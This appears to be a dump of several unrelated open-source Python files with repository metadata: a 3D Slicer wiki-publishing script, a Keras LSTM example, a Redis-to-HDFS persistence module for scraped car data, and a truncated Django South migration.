#-----------------------------------------------------------------------
def publishContentToWiki(wikiName, page, lines, comment=None):
if not comment:
(scriptName, scriptRev) = thisScriptNameAndRev()
comment = (
"This page has been updated using script {scriptName} (rev {scriptRev}).\n"
"For more details:\n"
" * https://github.com/Slicer/slicer-wiki-scripts\n"
" * https://www.slicer.org/wiki/Documentation/Nightly/Developers/Build_system/SlicerBot\n"
.format(scriptName=scriptName, scriptRev=scriptRev)
)
result = saveWikiPage(wikiName, page, comment, "\n".join(lines))
print(result)
#---------------------------------------------------------------------------
def updateWiki(slicerBuildDir, landingPage,
wikiName='slicer', updateWiki=True, slicerVersion=None):
try:
import mwclient
except ImportError:
runPip(['install', 'mwclient==0.6.5'], slicerBuildDir=slicerBuildDir)
import mwclient
# Update python path to ensure 'SlicerWizard' module can be imported
wizardPath = os.path.join(slicerBuildDir, 'bin', 'Python')
if wizardPath not in sys.path:
sys.path.append(wizardPath)
if slicerVersion is None:
slicerVersion = getSlicerVersion(slicerBuildDir)
# Clone repository hosting package metadata
cloneRepository(SLICER_PACKAGES_METADATA_GIT_URL, getPackagesMetadataTopLevelDirectory())
modulesMetadata = mergeMetadataFiles('slicer-modules-metadata_{0}'.format(
getSlicerReleaseIdentifier(slicerVersion)))
# Module -> Wiki links
moduleLinks = getModuleLinks(wikiName, modulesMetadata, slicerVersion)
# Module -> Categories
moduleCategories = getModuleCategories(modulesMetadata)
# Category[Category[...]] -> Modules
print("\nCollecting module 'categories with sub-categories'")
categoryModules = getCategoryItems(moduleCategories)
# Module -> Contributors
moduleContributors = getModuleContributors(modulesMetadata)
# Module: Collect contributing organizations and individuals
print("\nCollecting module 'contributing organizations and individuals'")
(organizationModules, individualModules,
moduleOrganizations, individualOrganizationsForModules) = \
getContributingOrganizationsAndIndividuals(moduleContributors)
# Module -> Extension
moduleExtensions = getModuleExtensions(getExtensionModules(slicerVersion))
# Module -> Type
moduleTypes = getModuleTypes(getExtensionModules(slicerVersion))
# Type -> Modules
typeModules = {}
for name in moduleTypes:
moduleType = moduleTypes[name]
if moduleType not in typeModules:
typeModules[moduleType] = []
if name in moduleLinks:
typeModules[moduleType].append(name)
# Extension -> Modules
extensionModules = {}
for name in moduleExtensions:
if name == 'builtin':
pass
moduleExtension = moduleExtensions[name]
if moduleExtension not in extensionModules:
extensionModules[moduleExtension] = []
if name in moduleLinks:
extensionModules[moduleExtension].append(name)
# Clone extension index
extensionsIndexBranch = 'master'
if isSlicerReleaseVersion(slicerVersion):
extensionsIndexBranch = getSlicerMajorMinorVersion(slicerVersion)
repo = cloneRepository(SLICER_EXTENSIONS_INDEX_GIT_URL,
getExtensionsIndexTopLevelDirectory(),
branch=extensionsIndexBranch)
# Extension -> Description files
SLICER_EXTENSIONS_SKIP = ['boost', 'Eigen']
extensionDescFiles = \
getDescriptionFiles(getExtensionsIndexTopLevelDirectory(), SLICER_EXTENSIONS_SKIP)
# Extension -> Wiki links
extensionLinks = \
generateItemWikiLinks('Extensions', wikiName, getExtensionHomepages(extensionDescFiles), slicerVersion)
# Extension -> Categories
extensionCategories = getExtensionCategories(extensionDescFiles)
# Category[Category[...]] -> Extensions
print("\nCollecting module 'categories with sub-categories'")
categoryExtensions = getCategoryItems(extensionCategories)
# Extension -> Contributors
extensionContributors = getExtensionContributors(extensionDescFiles)
# Extension: Collect contributing organizations and individuals
print("\nCollecting extension 'contributing organizations and individuals'")
(organizationExtensions, individualExtensions,
extensionOrganizations, individualOrganizationsForExtensions) = \
getContributingOrganizationsAndIndividuals(extensionContributors)
# Individual -> Organizations
individualOrganizations = _merge(dict(individualOrganizationsForExtensions), individualOrganizationsForModules)
# Extension -> Links: Working / Broken
availableExtensionLinks = \
{name: link for (name, link) in extensionLinks.iteritems() if name in extensionModules}
brokenExtensionLinks = \
{name: link for (name, link) in extensionLinks.iteritems() if name not in extensionModules}
# Category[Category[...]] -> Extensions: Working / Broken
availableExtensionCategories = \
{name: categories for (name, categories) in extensionCategories.iteritems() if name in extensionModules}
categoryAvailableExtensions = getCategoryItems(availableExtensionCategories)
brokenExtensionCategories = \
{name: categories for (name, categories) in extensionCategories.iteritems() if name not in extensionModules}
categoryBrokenExtensions = getCategoryItems(brokenExtensionCategories)
# Organization -> Extensions: Working / Broken
organizationAvailableExtensions = \
{organization: filter(lambda name: name in extensionModules, extensions) \
for (organization, extensions) in organizationExtensions.iteritems() }
organizationBrokenExtensions = \
{organization: filter(lambda name: name not in extensionModules, extensions) \
for (organization, extensions) in organizationExtensions.iteritems() }
# Individual -> Extensions: Working / Broken
individualAvailableExtensions = \
{individual: filter(lambda name: name in extensionModules, extensions) \
for (individual, extensions) in individualExtensions.iteritems() }
individualBrokenExtensions = \
{individual: filter(lambda name: name not in extensionModules, extensions) \
for (individual, extensions) in individualExtensions.iteritems() }
withSectionToc = True
#-----------------------------------------------------------------------
def _updateModuleLink(name, moduleLink):
if name in moduleExtensions:
extensionName = moduleExtensions[name]
if extensionName in extensionLinks:
extensionItem = extensionLinks[extensionName]
if moduleLinks[name]['type'] == WIKI_LINK_OFF:
moduleLink["wikilink"] = \
_generateWikiLink(extensionItem['type'],
'Extensions',
extensionName,
prettify(name),
extensionItem['url'],
slicerVersion)
return moduleLink
moduleLinks = {k:_updateModuleLink(k, v) for (k,v) in moduleLinks.iteritems()}
#-----------------------------------------------------------------------
def _excludeModule(name):
categories = moduleCategories[name]
for category in categories:
if category.split('.')[0] in ['Legacy', 'Testing', 'Developer Tools']:
return True
for subcategory in category.split('.'):
if subcategory in ['Test']:
return True
if re.search('SelfTest', name, flags=re.IGNORECASE) is not None:
return True
return False
moduleLinksFiltered = \
{k:v for (k,v) in moduleLinks.iteritems() if not _excludeModule(k)}
# Cache dictionnaries so that they can be re-used from the link renderer
setCacheEntry("extensionLinks", extensionLinks)
setCacheEntry("moduleExtensions", moduleExtensions)
setCacheEntry("moduleTypes", moduleTypes)
setCacheEntry("individualOrganizations", individualOrganizations)
moduleLinksRenderer = (headerForWikiList, moduleLinkAsListItem, footerForWikiList)
slicerReleaseIdentifier = getSlicerReleaseIdentifier(slicerVersion)
def _publishSection(section):
sections = [section]
content = []
if withSectionToc:
sections.append(createRawSection("__NOTOC__"))
content.extend(generateWikiToc(sections))
content.extend(generateWikiSections(sections))
subPage = "{0}/{1}".format(page, convertTitleToWikiAnchor(section[0]))
if updateWiki:
publishContentToWiki(wikiName, subPage, content)
return "* {}".format(wikiPageToWikiLink(subPage, section[0]))
# Wiki pages names
page = '{0}/{1}/ModuleExtensionListing'.format(landingPage, slicerReleaseIdentifier)
tocSubPage = "{0}/TOC".format(page)
sections = []
# Transclude toc subpage
if withSectionToc:
sections.append(createRawSection("__NOTOC__"))
sections.append(createRawSection("<noinclude>{{{{:{0}}}}}</noinclude>".format(tocSubPage)))
# Add sections
sections.append(itemByCategoryToWiki('Modules', moduleLinks,
categoryModules,
linksRenderer=moduleLinksRenderer,
withToc=withSectionToc))
sections.append(itemByNameToWiki('Modules',
moduleLinksFiltered,
linksRenderer=moduleLinksRenderer))
# Create one page per section
section = itemByPropertyToWiki('Modules', moduleLinks,
"contributing organization", organizationModules,
linksRenderer=moduleLinksRenderer,
withToc=withSectionToc)
sections.append(createRawTocEntry(_publishSection(section)))
section = itemByPropertyToWiki('Modules', moduleLinks,
"contributing individual", individualModules,
tocEntryRenderer=individualEntryAsWikiListItem,
linksRenderer=moduleLinksRenderer,
withToc=withSectionToc)
sections.append(createRawTocEntry(_publishSection(section)))
section = itemByPropertyToWiki('Modules', moduleLinks,
"type", typeModules,
linksRenderer=moduleLinksRenderer,
withToc=withSectionToc)
sections.append(createRawTocEntry(_publishSection(section)))
section = itemByPropertyToWiki('Modules', moduleLinks,
"extension", extensionModules,
linksRenderer=moduleLinksRenderer,
withToc=withSectionToc)
sections.append(createRawTocEntry(_publishSection(section)))
# Working extensions
section = itemByCategoryToWiki('Extensions', extensionLinks,
categoryAvailableExtensions,
withToc=withSectionToc)
sections.append(createRawTocEntry(_publishSection(section)))
section = itemByNameToWiki('Extensions', availableExtensionLinks)
sections.append(createRawTocEntry(_publishSection(section)))
section = itemByPropertyToWiki('Extensions', extensionLinks,
"contributing organization", organizationAvailableExtensions,
withToc=withSectionToc)
sections.append(createRawTocEntry(_publishSection(section)))
section = itemByPropertyToWiki('Extensions', extensionLinks,
"contributing individual", individualAvailableExtensions,
tocEntryRenderer=individualEntryAsWikiListItem,
withToc=withSectionToc)
sections.append(createRawTocEntry(_publishSection(section)))
# Add reference to list of broken extensions
brokenPage = "{0}/Broken".format(page)
brokenLink = wikiPageToWikiLink(brokenPage, "List of extensions known to be broken")
sections.append(createRawTocEntry("<br><small>{0}</small>".format(brokenLink)))
content = generateWikiSections(sections)
if updateWiki:
publishContentToWiki(wikiName, page, content)
# Generate toc subpage
if withSectionToc:
toc = generateWikiToc(sections)
if updateWiki:
publishContentToWiki(wikiName, tocSubPage, toc)
# Broken extensions
sections = []
sections.append(createRawTocEntry(
"This page lists all extensions known to be broken on "
"all supported platforms."))
sections.append(itemByCategoryToWiki('Broken extensions', extensionLinks,
categoryBrokenExtensions,
withToc=withSectionToc))
sections.append(itemByNameToWiki('Broken extensions', brokenExtensionLinks))
sections.append(itemByPropertyToWiki('Broken extensions', extensionLinks,
"contributing organization", organizationBrokenExtensions,
withToc=withSectionToc))
sections.append(itemByPropertyToWiki('Broken extensions', extensionLinks,
"contributing individual", individualBrokenExtensions,
tocEntryRenderer=individualEntryAsWikiListItem,
withToc=withSectionToc))
content = []
if withSectionToc:
content.extend(generateWikiToc(sections))
content.extend(generateWikiSections(sections))
if updateWiki:
publishContentToWiki(wikiName, brokenPage, content)
#---------------------------------------------------------------------------
def _updateWiki(args):
if args.cache_wiki_query:
loadPersistentCache()
setCacheEntry("wiki-slicer-password", args.slicer_wiki_password)
updateWiki(args.slicer_build_dir,
args.landing_page,
updateWiki=not args.no_wiki_update,
slicerVersion=args.slicer_version)
#---------------------------------------------------------------------------
setCacheEntry("wiki-slicer-username", "UpdateBot")
setCacheEntry("wiki-slicer-host", "www.slicer.org")
setCacheEntry("wiki-slicer-path", "/w/")
#---------------------------------------------------------------------------
if __name__ == '__main__':
import argparse
#=======================================================================
class VerboseErrorParser(argparse.ArgumentParser):
#-------------------------------------------------------------------
def error(self, message):
sys.stderr.write('error: %s\n' % message)
self.print_help(sys.stderr)
sys.exit(2)
#-----------------------------------------------------------------------
def _add_common_args(parser, withBuildDir=True):
if withBuildDir:
parser.add_argument('slicer_build_dir',
help='path to slicer inner build directory')
parser.add_argument('--slicer-version', dest='slicer_version', default=None,
help='slicer version to consider. By default, the slicer version '
'is autodiscovered running Slicer build directory. '
'For example: \"Slicer 4.4-Nightly\", \"Slicer 4.4\"')
parser = VerboseErrorParser(description='generate and publish Slicer extensions and modules list on the Slicer wiki')
commands = parser.add_subparsers()
#---
wiki_parser = commands.add_parser(
'update-wiki', help = 'update Slicer wiki')
_add_common_args(wiki_parser)
wiki_parser.add_argument('slicer_wiki_password',
help='slicer wiki password')
wiki_parser.add_argument('--cache-wiki-query', dest='cache_wiki_query',
action='store_true',
help='cache result of wiki query (for debugging)')
wiki_parser.add_argument('--no-wiki-update', dest='no_wiki_update',
action='store_true',
help='disable wiki update')
testLandingPage = 'User:UpdateBot/Issue-2843-Consolidated-Extension-List'
landingPage = 'Documentation'
wiki_parser.add_argument('--test-wiki-update', dest='test_wiki_update',
action='store_true',
help="update test landing page '{0}' instead of regular one '{1}'".format(
testLandingPage, landingPage))
wiki_parser.set_defaults(action=_updateWiki)
#--
save_loaded_parser = commands.add_parser(
'save-loaded-modules-metadata', help = 'save metadata of all Slicer modules (should be used in running Slice instance)')
_add_common_args(save_loaded_parser, withBuildDir=False)
save_loaded_parser.set_defaults(action=_saveLoadedModulesMetadata)
#--
saveAll_parser = commands.add_parser(
'publish-extension-module-metadata', help = 'publish metadata of all Slicer modules')
_add_common_args(saveAll_parser)
saveAll_parser.add_argument('slicer_extension_index_build_dir',
help='path to slicer extension index top-level build directory')
saveAll_parser.add_argument('--no-github-update', dest='no_github_update',
action='store_true',
help='disable github update')
saveAll_parser.set_defaults(action=_saveAllExtensionsModulesMetadata)
args = parser.parse_args()
if 'slicer_extension_index_build_dir' in args:
args.slicer_extension_index_build_dir = os.path.expanduser(args.slicer_extension_index_build_dir)
if 'slicer_build_dir' in args:
args.slicer_build_dir = os.path.expanduser(args.slicer_build_dir)
if args.action == _updateWiki:
args.landing_page = landingPage
if args.test_wiki_update:
args.landing_page = testLandingPage
args.action(args)
|
[
"jchris.fillionr@kitware.com"
] |
jchris.fillionr@kitware.com
|
a59c77a0cf3cfb08626bd1b5a506208c989c883b
|
31bf5d3210534b7efa30bdade6ff869e73a85d7a
|
/LSTMparameterstudy.py
|
5e1812d8aef7ae56379054a77bae3747796d0e02
|
[] |
no_license
|
fluxtransport/solar-terrestrial
|
e8b5d3b31bcb01432d974b042ca89c0f62003cf8
|
8caa446ee0a4723ca9aaf498f6b1784059859c38
|
refs/heads/master
| 2020-12-30T10:50:46.419791
| 2017-08-15T07:43:48
| 2017-08-15T07:43:48
| 98,829,922
| 1
| 0
| null | 2017-07-30T23:08:57
| 2017-07-30T23:08:56
| null |
UTF-8
|
Python
| false
| false
| 3,298
|
py
|
'''Example script showing how to use stateful RNNs
to model long sequences efficiently. Adapted from Keras examples.
'''
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
from keras.models import Sequential
from keras.layers import Dense, LSTM
# since we are using stateful rnn tsteps can be set to 1
tsteps = 1
batch_size = 50
epochs = 5000
neurons = 100
length = 500
period = 100
layers = 1
# number of elements ahead that are used to make the prediction
lahead = 1
def gen_cosine_amp(amp=100, period=period, x0=0, xn=length, step=1, k=0.01):
"""Generates an absolute cosine time series with the amplitude
exponentially decreasing
Arguments:
amp: amplitude of the cosine function
period: period of the cosine function
x0: initial x of the time series
xn: final x of the time series
step: step of the time series discretization
k: exponential rate
"""
cos = np.zeros(((xn - x0) * step, 1, 1))
for i in range(len(cos)):
idx = x0 + i * step
cos[i, 0, 0] = amp * np.cos(2 * np.pi * idx / period)
cos[i, 0, 0] = cos[i, 0, 0] * np.exp(-k * idx)
return cos
print('Generating Data...')
cos = gen_cosine_amp()
print('Input shape:', cos.shape)
expected_output = np.zeros((len(cos), 1))
for i in range(len(cos) - lahead):
expected_output[i, 0] = np.mean(cos[i + 1:i + lahead + 1])
print('Output shape:', expected_output.shape)
print('Creating Model...')
model = Sequential()
if layers<2:
model.add(LSTM(neurons,
input_shape=(tsteps, 1),
batch_size=batch_size,
return_sequences=False,
stateful=True))
else:
model.add(LSTM(neurons,
input_shape=(tsteps, 1),
batch_size=batch_size,
return_sequences=True,
stateful=True))
for i in range(layers-2):
model.add(LSTM(neurons,
return_sequences=True,
stateful=True))
model.add(LSTM(neurons,
return_sequences=False,
stateful=True))
model.add(Dense(1))
model.compile(loss='mse', optimizer='rmsprop')
print('Training')
for i in range(epochs):
print('Epoch', i, '/', epochs)
# Note that the last state for sample i in a batch will
# be used as initial state for sample i in the next batch.
# Thus we are simultaneously training on batch_size series with
# lower resolution than the original series contained in cos.
# Each of these series are offset by one step and can be
# extracted with cos[i::batch_size].
model.fit(cos, expected_output,
batch_size=batch_size,
epochs=1,
verbose=1,
shuffle=False)
model.reset_states()
print('Predicting')
#Invert and shrink the test set!
predicted_output = model.predict(-0.5*cos, batch_size=batch_size)
print('Plotting Results')
plt.plot(-0.5*expected_output)
plt.plot(predicted_output)
plt.title('Expected and Predicted\ntsteps = '+str(tsteps)+', batch_size = '+str(batch_size)+', epochs = '+str(epochs)+'\nneurons = '+str(neurons)+', layers = '+str(layers)+', length = '+str(length)+', period = '+str(period))
plt.show()
|
[
"chandmer@nasa-16.ibm.com"
] |
chandmer@nasa-16.ibm.com
|
0a8b3737dae342147407904474dce7c0f2332844
|
7e11051b65ea60193b4058039c63eed872720f49
|
/PersistenceMangement.py
|
9171c3377d5efc2601c0af82e2d09ca20b5c325d
|
[] |
no_license
|
ljm9104/guazi_spider
|
737c87fe1664bacfb06b2ed2b65134db7bcaeb96
|
5855edeea27e87fdf56d9a34a0b25306a832a1a6
|
refs/heads/master
| 2020-03-29T08:21:12.418753
| 2018-09-18T03:30:00
| 2018-09-18T03:30:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,823
|
py
|
# coding=utf8
"""
author: wangjiawei
date: 2018-09-05
该模块主要作为持久化模块
监听 ps_que队列
获取数据,然后持久化操作
"""
import time
import config
import datetime
from config import logger
from config import redis_cli
from utils import translate_2_json_dict
from utils import loads_json
from utils import write_2_file
from utils import make_set
from utils import dumps_json
from pyhdfs import HdfsClient
# 持久化队列
psm_que = config.psm_que
data_file = config.data_file
hdfs_path = config.hdfs_path
token = config.token
def listn_the_psm_que():
"""持续监听psm_que这个队列
只要一有数据过来,就做存储
"""
# 先反馈
# 完成后像队里推送一条已完成启动
print('持久化队列启动')
que = config.task_que_fb
ctx = dumps_json({'psm': 'done'})
redis_cli.lpush(que, ctx)
while True:
if redis_cli.exists(psm_que):
# 就开始处理
token_set = make_set(token, blank='', index='')
msg = redis_cli.rpop(psm_que)
seed = loads_json(translate_2_json_dict(msg))
print('{0}\t收到数据'.format(datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
# 接下来就是做持久化处理了
do_persistence(seed, token_set)
time.sleep(0.1)
def do_persistence(seed, id_set):
"""
做持久化处理
:param seed:待持久化的文件
"""
data_list = seed.get('data')
for each in data_list:
if each[0] not in id_set:
ctx = []
# 首先构建字段
ctx.append(seed.get('brand_id'))
ctx.append(seed.get('brand'))
ctx.append(seed.get('serise_id'))
ctx.append(seed.get('serise'))
ctx.append(seed.get('p_type'))
ctx.extend(each)
ctx.append(seed.get('date'))
ctx.append(datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S'))
ctx.append(str(seed.get('epoh')))
# 写入数据
text = '\u0001'.join(ctx)
write_2_file(data_file, text)
# 写入hdfs
append_2_hdfs(text)
# 记录new token
write_2_file(token, each[0])
del ctx
else:
print('数据id已存在')
def connect_hdfs():
return HdfsClient(hosts='47.98.32.168:50070', user_name='spider')
def append_2_hdfs(text):
try:
hdfs = connect_hdfs()
# 先看看文件在不在
if not hdfs.exists(hdfs_path):
hdfs.create(hdfs_path, (text + '\n').encode())
else:
hdfs.append(hdfs_path, (text + '\n').encode())
logger.info('完成写入集群....')
except:
logger.warning('集群写入错误')
|
[
"forme.wjw@aliyun.com"
] |
forme.wjw@aliyun.com
|
84f6829bee3e951fa4a5db4fa079b8d7c7e83f51
|
cf8506c0ddccced9cb5f8ee793f37eb7d136daa4
|
/apps/cart/migrations/0034_auto__del_shippinglabel__add_shipment__del_field_purchase_shipping_met.py
|
b39231e83b627c88f86889c4a60f4c44fefcdb89
|
[] |
no_license
|
Stunable/stella_site
|
f0dda05979db90bfced0039af949a0c983222152
|
b51bc01b4962517a312e37cc3b273693b89cfaf3
|
refs/heads/master
| 2021-03-27T08:56:32.850051
| 2013-02-05T04:48:32
| 2013-02-05T04:48:32
| 2,887,554
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,389
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'ShippingLabel'
db.delete_table('cart_shippinglabel')
# Adding model 'Shipment'
db.create_table('cart_shipment', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('purchase', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['cart.Purchase'])),
('tracking_number', self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True)),
('delivery_date', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('ship_date', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('shipping_method', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['retailers.ShippingType'], null=True, blank=True)),
('label', self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True)),
('status', self.gf('django.db.models.fields.CharField')(max_length=128)),
))
db.send_create_signal('cart', ['Shipment'])
# Deleting field 'Purchase.shipping_method'
db.delete_column('cart_purchase', 'shipping_method_id')
# Deleting field 'Purchase.shipping_number'
db.delete_column('cart_purchase', 'shipping_number')
# Deleting field 'Purchase.delivery_date'
db.delete_column('cart_purchase', 'delivery_date')
# Adding field 'Purchase.status'
db.add_column('cart_purchase', 'status',
self.gf('django.db.models.fields.CharField')(default='placed', max_length=32),
keep_default=False)
# Deleting field 'Item.shipping_method'
db.delete_column('cart_item', 'shipping_method_id')
# Deleting field 'Item.shipping_label'
db.delete_column('cart_item', 'shipping_label_id')
# Deleting field 'Item.shipping_number'
db.delete_column('cart_item', 'shipping_number')
def backwards(self, orm):
# Adding model 'ShippingLabel'
db.create_table('cart_shippinglabel', (
('image', self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('tracking_number', self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True)),
))
db.send_create_signal('cart', ['ShippingLabel'])
# Deleting model 'Shipment'
db.delete_table('cart_shipment')
# Adding field 'Purchase.shipping_method'
db.add_column('cart_purchase', 'shipping_method',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['retailers.ShippingType'], null=True, blank=True),
keep_default=False)
# Adding field 'Purchase.shipping_number'
db.add_column('cart_purchase', 'shipping_number',
self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True),
keep_default=False)
# Adding field 'Purchase.delivery_date'
db.add_column('cart_purchase', 'delivery_date',
self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True),
keep_default=False)
# Deleting field 'Purchase.status'
db.delete_column('cart_purchase', 'status')
# Adding field 'Item.shipping_method'
db.add_column('cart_item', 'shipping_method',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['retailers.ShippingType'], null=True, blank=True),
keep_default=False)
# Adding field 'Item.shipping_label'
db.add_column('cart_item', 'shipping_label',
self.gf('django.db.models.fields.related.ForeignKey')(to=orm['cart.ShippingLabel'], null=True, blank=True),
keep_default=False)
# Adding field 'Item.shipping_number'
db.add_column('cart_item', 'shipping_number',
self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True),
keep_default=False)
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'cart.cart': {
'Meta': {'ordering': "('-creation_date',)", 'object_name': 'Cart'},
'checked_out': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {}),
'grand_total': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ref': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'shipping_and_handling_cost': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'shipping_method': ('django.db.models.fields.related.ForeignKey', [], {'default': '4', 'to': "orm['retailers.ShippingType']", 'null': 'True', 'blank': 'True'})
},
'cart.checkout': {
'Meta': {'object_name': 'Checkout'},
'cart': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cart.Cart']"}),
'complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'purchaser': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'purchaser_checkout_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'ref': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'retailer': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'retailer_checkout_set'", 'null': 'True', 'to': "orm['auth.User']"})
},
'cart.item': {
'Meta': {'ordering': "('cart',)", 'object_name': 'Item'},
'cart': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cart.Cart']"}),
'color': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'destination_zip_code': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'quantity': ('django.db.models.fields.PositiveIntegerField', [], {}),
'sales_tax_amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '18', 'decimal_places': '2', 'blank': 'True'}),
'shipping_amount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '18', 'decimal_places': '2', 'blank': 'True'}),
'size': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'ordered'", 'max_length': '250'}),
'unit_price': ('django.db.models.fields.DecimalField', [], {'max_digits': '18', 'decimal_places': '2'})
},
'cart.purchase': {
'Meta': {'object_name': 'Purchase'},
'cart': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cart.Cart']"}),
'checkout': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cart.Checkout']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cart.Item']"}),
'purchased_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'purchaser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'ref': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'placed'", 'max_length': '32'}),
'transaction': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['stunable_wepay.WePayTransaction']"})
},
'cart.shipment': {
'Meta': {'object_name': 'Shipment'},
'delivery_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'purchase': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cart.Purchase']"}),
'ship_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'shipping_method': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['retailers.ShippingType']", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'tracking_number': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'retailers.shippingtype': {
'Meta': {'object_name': 'ShippingType'},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'vendor': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
